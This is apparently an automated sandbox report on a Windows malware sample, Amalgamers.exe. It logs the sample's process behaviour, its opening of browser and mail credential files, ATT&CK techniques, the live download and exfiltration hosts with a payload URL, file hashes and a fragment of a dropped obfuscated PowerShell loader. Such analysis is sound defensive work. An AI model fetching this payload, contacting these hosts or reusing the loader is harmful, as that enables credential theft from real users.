            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 600, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: Yara matchFile source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 600, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 600, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Software Packing
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            1
            Exfiltration Over Alternative Protocol
            1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            DLL Side-Loading
            LSASS Memory24
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            Masquerading
            Security Account Manager211
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook131
            Virtualization/Sandbox Evasion
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Access Token Manipulation
            LSA Secrets131
            Virtualization/Sandbox Evasion
            SSHKeylogging23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
            Process Injection
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552876 Sample: Amalgamers.exe Startdate: 09/11/2024 Architecture: WINDOWS Score: 100 32 ftp.carbognin.it 2->32 34 abreo.pl 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for dropped file 2->46 48 3 other signatures 2->48 8 Amalgamers.exe 26 2->8         started        signatures3 process4 file5 22 C:\Users\user\AppData\...\Akhoond106.Iml, ASCII 8->22 dropped 50 Suspicious powershell command line found 8->50 12 powershell.exe 27 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\Amalgamers.exe, PE32 12->24 dropped 26 C:\Users\...\Amalgamers.exe:Zone.Identifier, ASCII 12->26 dropped 52 Early bird code injection technique detected 12->52 54 Writes to foreign memory regions 12->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 12->56 58 3 other signatures 12->58 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 ftp.carbognin.it 86.107.36.93, 21, 35643, 49819 DIALTELECOMRO Romania 16->28 30 abreo.pl 185.36.171.17, 443, 49797, 49803 ECO-ATMAN-PLECO-ATMAN-PL Poland 16->30 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to steal Mail credentials (via file / registry access) 16->38 40 Tries to harvest and steal browser information (history, passwords, etc) 16->40 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Amalgamers.exe58%ReversingLabsWin32.Trojan.Leonem
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe58%ReversingLabsWin32.Trojan.Leonem
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://ftp.carbognin.it0%Avira URL Cloudsafe
            https://abreo.pl/0%Avira URL Cloudsafe
            https://abreo.pl//CNDKMREh44.bincq0%Avira URL Cloudsafe
            https://abreo.pl//CNDKMREh44.bin0%Avira URL Cloudsafe
            http://abreo.pl//CNDKMREh44.bina0%Avira URL Cloudsafe
            http://abreo.pl//CNDKMREh44.bin0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            abreo.pl
            185.36.171.17
            truefalse
              unknown
              ftp.carbognin.it
              86.107.36.93
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://abreo.pl//CNDKMREh44.binfalse
                • Avira URL Cloud: safe
                unknown
                http://abreo.pl//CNDKMREh44.binfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://abreo.pl//CNDKMREh44.binamsiexec.exe, 00000006.00000002.2878965092.000000000855C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorAmalgamers.exe, Amalgamers.exe.1.drfalse
                  high
                  http://nsis.sf.net/NSIS_ErrorErrorAmalgamers.exe, Amalgamers.exe.1.drfalse
                    high
                    https://abreo.pl/msiexec.exe, 00000006.00000002.2878965092.000000000851A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://abreo.pl//CNDKMREh44.bincqmsiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ftp.carbognin.itmsiexec.exe, 00000006.00000002.2891546582.0000000023FCC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.36.171.17
                      abreo.plPoland
                      57367ECO-ATMAN-PLECO-ATMAN-PLfalse
                      86.107.36.93
                      ftp.carbognin.itRomania
                      6910DIALTELECOMROtrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1552876
                      Start date and time:2024-11-09 20:45:04 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Amalgamers.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@6/17@2/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 63
                      • Number of non-executed functions: 30
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target msiexec.exe, PID 600 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Amalgamers.exe
                      TimeTypeDescription
                      14:45:53API Interceptor41x Sleep call for process: powershell.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      86.107.36.93FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          Rendeles_110078670008860000002.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            Rendeles_1100786700088673955430.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              wzjEaheCBP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                4MQ9rTK7AV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  Doc22378670008869955430311.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                    doc222378670008869955430341.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ftp.carbognin.itFLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 86.107.36.93
                                      ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 86.107.36.93
                                      Rendeles_110078670008860000002.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      • 86.107.36.93
                                      Rendeles_1100786700088673955430.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      • 86.107.36.93
                                      wzjEaheCBP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      • 86.107.36.93
                                      4MQ9rTK7AV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      • 86.107.36.93
                                      Doc22378670008869955430311.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      • 86.107.36.93
                                      doc222378670008869955430341.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      • 86.107.36.93
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      DIALTELECOMRO#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                      • 92.114.2.230
                                      FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 86.107.36.93
                                      splppc.elfGet hashmaliciousUnknownBrowse
                                      • 188.209.98.177
                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                      • 93.114.114.57
                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                      • 46.102.13.204
                                      SecuriteInfo.com.Win32.Sector.30.15961.3704.exeGet hashmaliciousSalityBrowse
                                      • 89.41.154.115
                                      n5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                      • 89.41.154.115
                                      PfBjDhHzvV.exeGet hashmaliciousMetasploit, SalityBrowse
                                      • 89.41.154.115
                                      https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                      • 89.43.104.93
                                      https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                      • 89.43.104.204
                                      ECO-ATMAN-PLECO-ATMAN-PLStatement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                      • 213.189.52.181
                                      9zldYT23H2.elfGet hashmaliciousMirai, GafgytBrowse
                                      • 31.186.82.2
                                      RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                      • 128.204.223.111
                                      http://bdvenlineabanven.serv00.net/Get hashmaliciousUnknownBrowse
                                      • 85.194.246.69
                                      http://entrabdvline.serv00.net/Get hashmaliciousUnknownBrowse
                                      • 85.194.246.69
                                      http://entrabdvline.serv00.net/Get hashmaliciousUnknownBrowse
                                      • 85.194.246.69
                                      http://ahksoch.serv00.net/x92gamy6wh/Get hashmaliciousHTMLPhisherBrowse
                                      • 128.204.218.63
                                      http://intesa-it.serv00.net/it/conto/Get hashmaliciousUnknownBrowse
                                      • 85.194.246.69
                                      https://spofity.serv00.net/spotify/auth/login.phpGet hashmaliciousUnknownBrowse
                                      • 128.204.223.117
                                      http://www.viundodal.serv00.net/Get hashmaliciousUnknownBrowse
                                      • 128.204.218.63
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19zGHItMC5Zc.exeGet hashmaliciousStealcBrowse
                                      • 185.36.171.17
                                      ozcAR7VO6Y.exeGet hashmaliciousStealcBrowse
                                      • 185.36.171.17
                                      62ccfDfPfE.exeGet hashmaliciousUnknownBrowse
                                      • 185.36.171.17
                                      62ccfDfPfE.exeGet hashmaliciousUnknownBrowse
                                      • 185.36.171.17
                                      6G1YhrEmQu.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 185.36.171.17
                                      s-white-82333.jsGet hashmaliciousUnknownBrowse
                                      • 185.36.171.17
                                      s-white-82333.jsGet hashmaliciousUnknownBrowse
                                      • 185.36.171.17
                                      Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 185.36.171.17
                                      Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 185.36.171.17
                                      LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 185.36.171.17
                                      No context
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):14744
                                      Entropy (8bit):4.992175361088568
                                      Encrypted:false
                                      SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                      MD5:A35685B2B980F4BD3C6FD278EA661412
                                      SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                      SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                      SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:ASCII text, with very long lines (3119), with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):55332
                                      Entropy (8bit):5.353645282488102
                                      Encrypted:false
                                      SSDEEP:1536:W7TLdGG2daYXupOFS8WkIIUGKoqutVa5q:MTLdGG2daTH7uvaM
                                      MD5:238316EBDAA46CABC02E1A00873CD9F1
                                      SHA1:0025BF9056BF6B4D8E7FBA5543D2129E55036E0B
                                      SHA-256:7E6E82376CB78683193983E6740D285784626A16930BB3FD68F416141EBB152D
                                      SHA-512:9C0D356CF90DA59F716CF975AA076B5ED5799344746211328BFBBF4D823004A3E9DD37F5E7A3EE9389B51A3F377D9983294068511C7DB593BB143502D313766B
                                      Malicious:true
                                      Reputation:low
                                      Preview:$Undermark=$Dewooling;..<#Stationerede Muta Uforstandighedernes #>..<#Mindelundes Annammede Striktrjer Microelectrode Crockeryware Aggrievedly #>..<#Lagerkapacitets Trodser Mislyde Stedsbiord Aishas #>..<#Lejesoldatens yaourt Anomalogonatous Galeiform kvleris Cocktailrysterne overdragernes #>..<#Lsefelts Precarious Sjlehelgenens Dazed Spdbrnsplejerskes #>..<#Amphibiological Inweaving Mellemleddets Increscence #>...$Turdansene = @'.Whiss.Proe.$Porp VVulcaaLej elBetydlUnderiLavvaeRepub9Go er0Pregh=Lap d$PlantGBrydneHagmajebeltsM.diet,lowteStraarKnigh;Fi,tc.Municf BalluDepasnKopmacBeematPornoiElektoCort,n erma TrifeOAlbahvWoodbe NoncrantihsCallitPeptirSkrmim OvermBogfreDist,d Sp teKrlig Plac(Harqu$ChyliGTaca,rhyp suPercebRef abColone GelprNbbesyBesgs1Insol6Jentj3 Tjen,Inves$Kafi,VAvokar.mposdMurstiDeso gSucceh etsie engedBogbes CovekbrnebrFymataChaptvOver,sVin s)Gaull Fras{Elorg.N nda.Hiero$K nsuR brude obulaFors vPerineTolersm lee Under(Acan L MeteiA,tihv SlansBedkkla phinDybvanDragneB
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Category:dropped
                                      Size (bytes):942432
                                      Entropy (8bit):7.854546227436502
                                      Encrypted:false
                                      SSDEEP:24576:IyG1qpfQfJtOutBz+sTrMEnPaS9Jv8MPtquNs:D8qeRg8BzPMEyS3LPfNs
                                      MD5:E2A5B947AC8266E79CC0C9FAFF051849
                                      SHA1:A128AAC0DE4BBF879F7DF28526E6B59A30FB82B1
                                      SHA-256:B5276A247BE390E58BBB52535B1437F1AAE13CA70930CE885C8AAD870BA01053
                                      SHA-512:E44B6DC1E3043C5AA4E030180B071C8E6B007672FEACF9A6044A656DE55DB499C9F34C3ED9A1D0553DEDDD6FB1C241226F70348B178326292DFDB281BA6EDDE5
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...)..\.................d...|.......2............@.......................... .......g....@.................................<.......................PX...............................................................................................text....b.......d.................. ..`.rdata..\............h..............@..@.data....U...........|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):440690
                                      Entropy (8bit):1.255581911697702
                                      Encrypted:false
                                      SSDEEP:1536:G1N2MtdS2LvejlGHy8HheDep9Au5JxtyhfTby:cN2wddLWgHrBv9FDtGfTby
                                      MD5:AE5B0E26F9F3A5A2DA1071D81623F492
                                      SHA1:E6DF996B040001B45BC5DF188A812FFCA228402F
                                      SHA-256:40905A865B10C2C4A8628EB591026C72569F84DF34595095CEE5687037BCE8C1
                                      SHA-512:FBF0607DDA3B81358E1E629625AFF263F0246128C5B3EC0665FF3D09AD82C64D4A9CF699E17338710BBAD7F530BF9BB6C025BA1B10B43EAC6BE0F24F61529859
                                      Malicious:false
                                      Reputation:low
                                      Preview:........................................C.......Z..............................................................................................................C.......a..............+..................j.............................................m..............................l.......,............$...........+....................... .............................................................S.a....................&..................................................................................u................................................................................a...........................*.................D......E.................................................M......G.................................................................... .................................................%..................W...H....'..................................@a...........O................................................v.............................................................
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):409561
                                      Entropy (8bit):1.256529395530017
                                      Encrypted:false
                                      SSDEEP:768:RhkK/VMgjc5rBHA53RJq0JhgYHWaQcVEVvbqaS3XDmLVKc3uL3edED7YBjRoAbvd:w6vrrHCXJkW5C4jts0K2y8VzuOvuW
                                      MD5:C2731713BAF2EDFFFFF7C53C3C61CD53
                                      SHA1:A6C43F762C7C3167D0B42D5DD6E3B312E16A8308
                                      SHA-256:36E586A6BF59992B10270BEC66272E881E419BFE28DB677A26209960D34BF17D
                                      SHA-512:2CB775B85A98A3344CA45003E64C65D001FAF8ACBBB8AADDA19B18305F4D9565B6AA7CAEBCCF5496B6CC4315FC7C99574175F50FF5E220A8FACD939C33B3B4AA
                                      Malicious:false
                                      Reputation:low
                                      Preview:..........................................................................................}.........................v.....................................................................G.....w...............................5.............................................J........................................................K..........................M.........................................................................y.T..........................................$...................t...F...........................................................................X...................................t.............................................................u................................................".................................y..........................................~..................................................................................N..........................|..........................................J................................................
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):432
                                      Entropy (8bit):4.271166045363327
                                      Encrypted:false
                                      SSDEEP:12:mGujq8VseUm/LlyyocSEMXbP0WeWegCQW4YNC1ApmP:juY6d4EKP0/gCQNc8P
                                      MD5:93830656C8BBC22387F3539DB1AA7892
                                      SHA1:CA06079A8DCDD33C056B3134DDA7F493C9D5B956
                                      SHA-256:BFCAF44A84BE23126AF3FB6A20E4803F7821CB3EC1C29A2DB815311640928095
                                      SHA-512:8AE2D33B2908CA53FC7CCF2FEC0F9A196E5E929B3186A82461D1CAA25314E192075FFDBA869D2B61EC8D747DCB22A8E9B485CB6EFE95C9FBB9C3D145CFBFD263
                                      Malicious:false
                                      Preview:svrdlilje gogopigerne irresponsive frigoric,schferhunden uddelighedernes inspirer levodopa fintskaarnes exonerative buspassagerer interrelations bourgeoisies soldados..calamumi parmigiana spoliated sekundovioliner stract inorthography jnedes,vandreaar magnat nauseousness blackbeard skywrite..finansimperierne autodafgps skoleleder noncelestially elefantridder.tjledes nyamwezi yppersteprsteliges mortarise rechain dysphonia teenet,
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):336987
                                      Entropy (8bit):7.666340371530923
                                      Encrypted:false
